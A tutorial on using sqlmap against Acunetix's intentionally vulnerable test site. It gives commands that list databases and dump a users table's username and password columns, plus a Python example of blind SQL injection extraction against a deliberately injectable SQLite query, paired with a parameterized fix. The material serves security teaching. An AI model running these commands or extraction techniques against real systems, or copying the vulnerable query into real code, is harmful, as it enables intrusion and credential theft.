SQLMAP


Sqlmap is an open source penetration testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers. It comes with a powerful detection engine, many niche features for the experienced penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 

https://github.com/sqlmapproject/sqlmap 

Installation

To install sqlmap, clone it from the GitHub link above or install the distribution package: 

  •  apt-get install sqlmap 

It comes preinstalled in Kali Linux. 

To exploit an SQLi flaw with sqlmap: 

       1. First find an injectable parameter in the web application. 

           testphp.vulnweb.com/listproducts.php?cat=2' 

           Appending a single quote to the value makes the page return a database error, which shows that the cat parameter is passed into the SQL query unsanitized (testphp.vulnweb.com is Acunetix's intentionally vulnerable test site). 

       2. Then launch sqlmap to enumerate databases, tables and columns and dump data from the vulnerable site. 

            Note: Using sqlmap against a target without proper permission is illegal. 

            -u url          the target URL (quote it in the shell, since ? and & are shell metacharacters) 

            -p parameter    the parameter to test (here cat); without it sqlmap tests every parameter it finds 

            --dbs           list the databases 

            --tables        list the tables (together with -D database) 

            --columns       list the columns (together with -D database -T table) 

Sqlmap can take a long time: it first fingerprints the backend DBMS (MySQL, MSSQL, Oracle, etc.) and then tries its injection techniques (boolean-based blind, error-based, UNION query, stacked queries, time-based blind) against the parameter. If the backend is already known, --dbms narrows the tests, and --batch answers sqlmap's prompts with their defaults so the run does not stall waiting for input. 

Once --dbs has listed the databases (here acuart), fetch that database's tables: 

  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat -D acuart --tables 

Then dump the username and password columns from the users table: 

  • sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=2" -p cat -D acuart -T users -C uname,pass --dump 

The same switches work when the injection is blind: sqlmap then recovers the data one true/false (or time-delay) request at a time instead of reading it from the response, which is why such a dump takes much longer. 
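The following is an added example, not sqlmap's code and not from the original page: it carries out the two steps above by hand against a constructed, deliberately vulnerable lookup so the mechanics sqlmap automates are visible. The in-memory SQLite database, the table and column names (products, users, uname, pass, chosen to mirror the page's target) and the rows are all made up for the example. A real sqlmap run sends the same kind of payloads over HTTP and infers true/false from differences in the page; here the handler simply returns the rows the query produced.

```python
"""Constructed example of the single-quote test and a boolean-based blind dump.

Nothing here is sqlmap's code or real target data: the database, tables and rows
are made up for the demonstration.
"""
import sqlite3

# Constructed in-memory stand-in for the target's database.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
    INSERT INTO products VALUES (1, 1, 'Shirt'), (2, 2, 'Hat'), (3, 2, 'Scarf');
    CREATE TABLE users (uname TEXT, pass TEXT);
    INSERT INTO users VALUES ('test', 'S3cret!');
""")


def listproducts_vulnerable(cat):
    """Stand-in for listproducts.php?cat=...: the value is pasted into the SQL."""
    sql = "SELECT name FROM products WHERE cat=" + cat          # injectable
    return [row[0] for row in conn.execute(sql)]


def listproducts_fixed(cat):
    """Hardened version: a bound parameter never becomes part of the SQL text."""
    sql = "SELECT name FROM products WHERE cat=?"
    return [row[0] for row in conn.execute(sql, (cat,))]


def single_quote_test(handler, value="2"):
    """Step 1 from the page: append a quote and watch for a database error.
    True means the query broke, a strong sign the parameter is injectable."""
    try:
        handler(value + "'")
        return False
    except sqlite3.Error:
        return True


def blind_extract(handler, column, table, base="2", max_len=64):
    """Boolean-based blind extraction, the technique sqlmap automates when the
    page shows neither errors nor query output.  Each request asks one yes/no
    question about one character of the target value, and the answer is read
    from whether any products came back.  Bisection over the printable range
    costs about seven requests per character instead of up to 95."""
    result = ""
    for pos in range(1, max_len + 1):
        ch = f"unicode(substr((SELECT {column} FROM {table} LIMIT 1),{pos},1))"
        # Past the end of the string substr() yields '' and unicode('') is NULL,
        # so this probe comes back false and the dump is complete.
        if not handler(f"{base} AND {ch} IS NOT NULL"):
            break
        lo, hi = 32, 126                       # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if handler(f"{base} AND {ch} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    for name, h in (("vulnerable", listproducts_vulnerable),
                    ("fixed", listproducts_fixed)):
        print(f"{name}: quote test -> {single_quote_test(h)}, "
              f"uname -> {blind_extract(h, 'uname', 'users')!r}, "
              f"pass -> {blind_extract(h, 'pass', 'users')!r}")
```

Against the vulnerable handler the quote test raises a syntax error and the blind loop recovers both columns of the users row; against the parameterized handler the quote is just data, the probes match no row, and the dump comes back empty. Swapping the hard-coded `unicode(substr(...))` expression for the equivalent functions of MySQL, MSSQL or Oracle is exactly the per-DBMS work that makes sqlmap's fingerprinting step worthwhile.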
